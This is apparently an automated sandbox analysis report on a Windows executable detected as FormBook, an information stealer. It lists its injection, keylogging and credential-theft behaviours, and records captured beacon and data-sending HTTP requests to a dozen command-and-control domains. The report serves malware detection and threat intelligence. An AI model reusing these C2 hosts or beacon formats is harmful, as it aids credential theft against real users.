Windows Analysis Report
150-425-2024.exe

Overview

General Information

Sample name: 150-425-2024.exe
Analysis ID: 1432025
MD5: c93c9f74b4f78e098f297fd4dafff423
SHA1: f516c24f73d9448263a4b3f12145d05ab2019c07
SHA256: 7176ddc82577be37240e7842e497ed7a16af40ff27cf8db62439422f93994c47
Tags: exe
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected FormBook
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Connects to several IPs in different countries
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection

barindex
Source: http://www.empowermedeco.com/fo8o/ Avira URL Cloud: Label: malware
Source: http://www.660danm.top/fo8o/ Avira URL Cloud: Label: phishing
Source: http://www.magmadokum.com/fo8o/ Avira URL Cloud: Label: malware
Source: http://www.rssnewscast.com/fo8o/ Avira URL Cloud: Label: malware
Source: http://www.antonio-vivaldi.mobi/fo8o/?OVFPBtpp=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6ZLGRXwZUnYA2j0639iiTYeQFS7gKg6A==&-LXd8=qhq0rNepS Avira URL Cloud: Label: malware
Source: http://www.rssnewscast.com/fo8o/?OVFPBtpp=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdN4JwRnXK0Z16Z0RVxT0NpaHfOGkEn8Q==&-LXd8=qhq0rNepS Avira URL Cloud: Label: malware
Source: http://www.magmadokum.com/fo8o/?OVFPBtpp=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjckokWPFlpLgmRSSw2BhiETUwcdg1EQ==&-LXd8=qhq0rNepS Avira URL Cloud: Label: malware
Source: http://www.antonio-vivaldi.mobi/fo8o/ Avira URL Cloud: Label: malware
Source: http://www.elettrosistemista.zip/fo8o/ Avira URL Cloud: Label: malware
Source: http://www.empowermedeco.com Avira URL Cloud: Label: malware
Source: https://www.empowermedeco.com/fo8o/?OVFPBtpp=mxnR Avira URL Cloud: Label: malware
Source: http://www.elettrosistemista.zip/fo8o/?OVFPBtpp=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMdSNhe6OmyHrxid8+dZ6jJ+tsZTLp5A==&-LXd8=qhq0rNepS Avira URL Cloud: Label: malware
Source: http://www.660danm.top/fo8o/?OVFPBtpp=tDTx8bBUOSgexthNYhTwmnqDpn1F4phVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrY/D+TcC9TMB/RoFCEllCpPhJWUqMeQ==&-LXd8=qhq0rNepS Avira URL Cloud: Label: phishing
Source: http://www.empowermedeco.com/fo8o/?OVFPBtpp=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKJgdY6IPBFaQuYrbCSDzxJjPROalSnA==&-LXd8=qhq0rNepS Avira URL Cloud: Label: malware
Source: http://www.techchains.info/fo8o/ Avira URL Cloud: Label: malware
Source: empowermedeco.com Virustotal: Detection: 10% Perma Link
Source: www.660danm.top Virustotal: Detection: 10% Perma Link
Source: www.antonio-vivaldi.mobi Virustotal: Detection: 10% Perma Link
Source: www.rssnewscast.com Virustotal: Detection: 9% Perma Link
Source: www.techchains.info Virustotal: Detection: 9% Perma Link
Source: www.elettrosistemista.zip Virustotal: Detection: 5% Perma Link
Source: www.donnavariedades.com Virustotal: Detection: 5% Perma Link
Source: www.empowermedeco.com Virustotal: Detection: 5% Perma Link
Source: www.magmadokum.com Virustotal: Detection: 9% Perma Link
Source: http://www.empowermedeco.com/fo8o/ Virustotal: Detection: 7% Perma Link
Source: http://www.rssnewscast.com/fo8o/ Virustotal: Detection: 7% Perma Link
Source: http://www.magmadokum.com/fo8o/ Virustotal: Detection: 6% Perma Link
Source: http://www.660danm.top/fo8o/ Virustotal: Detection: 9% Perma Link
Source: http://www.antonio-vivaldi.mobi/fo8o/ Virustotal: Detection: 7% Perma Link
Source: http://www.empowermedeco.com Virustotal: Detection: 5% Perma Link
Source: 150-425-2024.exe ReversingLabs: Detection: 47%
Source: 150-425-2024.exe Virustotal: Detection: 28% Perma Link
Source: Yara match File source: 2.2.svchost.exe.600000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.600000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.1583707239.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3915191232.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3897905735.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.3915118519.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1584717974.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1583886010.0000000002930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3915054497.0000000003230000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: 150-425-2024.exe Joe Sandbox ML: detected
Source: 150-425-2024.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000003.00000000.1505609494.00000000006BE000.00000002.00000001.01000000.00000004.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000000.1655891040.00000000006BE000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: wntdll.pdbUGP source: 150-425-2024.exe, 00000000.00000003.1447380115.0000000004020000.00000004.00001000.00020000.00000000.sdmp, 150-425-2024.exe, 00000000.00000003.1444736163.0000000003E80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1491506539.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1584116157.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1584116157.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1489430739.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3917880903.000000000340E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3917880903.0000000003270000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1587522806.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1584000279.0000000002F12000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: 150-425-2024.exe, 00000000.00000003.1447380115.0000000004020000.00000004.00001000.00020000.00000000.sdmp, 150-425-2024.exe, 00000000.00000003.1444736163.0000000003E80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1491506539.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1584116157.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1584116157.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1489430739.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000002.3917880903.000000000340E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3917880903.0000000003270000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1587522806.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1584000279.0000000002F12000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.1583975523.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1548871766.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000003.00000002.3914413395.0000000000B98000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.3910307845.0000000002BEE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3918311897.000000000389C000.00000004.10000000.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000000.1656364665.0000000002F8C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1874354603.000000003887C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.3910307845.0000000002BEE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3918311897.000000000389C000.00000004.10000000.00040000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000008.00000000.1656364665.0000000002F8C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1874354603.000000003887C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.1583975523.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1548871766.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe, 00000003.00000002.3914413395.0000000000B98000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C24696 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00C24696
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C2C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_00C2C9C7
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C2C93C FindFirstFileW,FindClose, 0_2_00C2C93C
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C2F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00C2F200
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C2F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00C2F35D
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C2F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00C2F65E
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C23A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00C23A2B
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C23D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00C23D4E
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C2BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00C2BF27
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_00A1BAB0 FindFirstFileW,FindNextFileW,FindClose, 4_2_00A1BAB0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4x nop then xor eax, eax 4_2_00A09480
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4x nop then pop edi 4_2_00A0DD45

Networking

barindex
Source: DNS query: www.joyesi.xyz
Source: unknown Network traffic detected: IP country count 11
Source: Joe Sandbox View IP Address: 91.195.240.94 91.195.240.94
Source: Joe Sandbox View IP Address: 195.110.124.133 195.110.124.133
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\150-425-2024.exe Code function: 0_2_00C325E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile, 0_2_00C325E2
Source: global traffic HTTP traffic detected: GET /fo8o/?OVFPBtpp=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KtR967KJkZjHO4n68kz2fsmRVZ8Q==&-LXd8=qhq0rNepS HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.3xfootball.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic HTTP traffic detected: GET /fo8o/?OVFPBtpp=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ89eOK51Mgi6ytQL9yeTtlbiBUAmNTsA==&-LXd8=qhq0rNepS HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.kasegitai.tokyoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic HTTP traffic detected: GET /fo8o/?OVFPBtpp=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFgSElgiguhIU1cq+9C59UXHMaDdPWVQ==&-LXd8=qhq0rNepS HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.goldenjade-travel.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic HTTP traffic detected: GET /fo8o/?OVFPBtpp=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6ZLGRXwZUnYA2j0639iiTYeQFS7gKg6A==&-LXd8=qhq0rNepS HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.antonio-vivaldi.mobiConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic HTTP traffic detected: GET /fo8o/?OVFPBtpp=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjckokWPFlpLgmRSSw2BhiETUwcdg1EQ==&-LXd8=qhq0rNepS HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.magmadokum.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic HTTP traffic detected: GET /fo8o/?OVFPBtpp=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdN4JwRnXK0Z16Z0RVxT0NpaHfOGkEn8Q==&-LXd8=qhq0rNepS HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.rssnewscast.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic HTTP traffic detected: GET /fo8o/?OVFPBtpp=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hLa4RxULGVWJLXVKOGZXf4u2rY2O36g==&-LXd8=qhq0rNepS HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.techchains.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic HTTP traffic detected: GET /fo8o/?OVFPBtpp=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMdSNhe6OmyHrxid8+dZ6jJ+tsZTLp5A==&-LXd8=qhq0rNepS HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.elettrosistemista.zipConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic HTTP traffic detected: GET /fo8o/?OVFPBtpp=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pThujZncl+tVTqRpQa58ob5uovzcVfw==&-LXd8=qhq0rNepS HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.donnavariedades.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic HTTP traffic detected: GET /fo8o/?OVFPBtpp=tDTx8bBUOSgexthNYhTwmnqDpn1F4phVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrY/D+TcC9TMB/RoFCEllCpPhJWUqMeQ==&-LXd8=qhq0rNepS HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.660danm.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic HTTP traffic detected: GET /fo8o/?OVFPBtpp=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKJgdY6IPBFaQuYrbCSDzxJjPROalSnA==&-LXd8=qhq0rNepS HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.empowermedeco.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic DNS traffic detected: DNS query: www.3xfootball.com
Source: global traffic DNS traffic detected: DNS query: www.kasegitai.tokyo
Source: global traffic DNS traffic detected: DNS query: www.goldenjade-travel.com
Source: global traffic DNS traffic detected: DNS query: www.antonio-vivaldi.mobi
Source: global traffic DNS traffic detected: DNS query: www.magmadokum.com
Source: global traffic DNS traffic detected: DNS query: www.rssnewscast.com
Source: global traffic DNS traffic detected: DNS query: www.liangyuen528.com
Source: global traffic DNS traffic detected: DNS query: www.techchains.info
Source: global traffic DNS traffic detected: DNS query: www.elettrosistemista.zip
Source: global traffic DNS traffic detected: DNS query: www.donnavariedades.com
Source: global traffic DNS traffic detected: DNS query: www.660danm.top
Source: global traffic DNS traffic detected: DNS query: www.empowermedeco.com
Source: global traffic DNS traffic detected: DNS query: www.joyesi.xyz
Source: unknown HTTP traffic detected: POST /fo8o/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brHost: www.kasegitai.tokyoOrigin: http://www.kasegitai.tokyoCache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 197Referer: http://www.kasegitai.tokyo/fo8o/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)Data Raw: 4f 56 46 50 42 74 70 70 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 4a 5a 76 70 77 56 49 68 75 42 43 58 53 48 62 6c 32 71 6c 5a 2b 79 49 57 5a 2b 61 46 2f 2f 42 72 6b 77 51 5a 6d 6c 71 64 38 54 35 32 76 54 57 45 67 77 41 56 68 42 38 69 6e 33 6f 45 74 35 2f 53 55 34 79 6d 76 43 4e 39 73 66 79 73 79 67 68 45 77 5a 4f 31 47 62 49 4d 4c 67 45 53 42 69 78 58 65 77 45 46 2f 33 64 62 2b 4f 4f 6c 58 45 70 6a 39 6f 58 75 59 57 54 43 67 42 68 32 50 37 39 7a 47 73 76 43 58 68 7a 62 50 30 42 39 74 70 48 4a 50 4e 6d 66 65 32 50 36 35 52 31 36 77 70 59 45 4b 41 6c 70 46 79 32 6b 5a 6e 4b 34 78 55 42 50 Data Ascii: OVFPBtpp=5JlKLzaKVp1wJZvpwVIhuBCXSHbl2qlZ+yIWZ+aF//BrkwQZmlqd8T52vTWEgwAVhB8in3oEt5/SU4ymvCN9sfysyghEwZO1GbIMLgESBixXewEF/3db+OOlXEpj9oXuYWTCgBh2P79zGsvCXhzbP0B9tpHJPNmfe2P65R16wpYEKAlpFy2kZnK4xUBP
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Apr 2024 08:06:53 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and 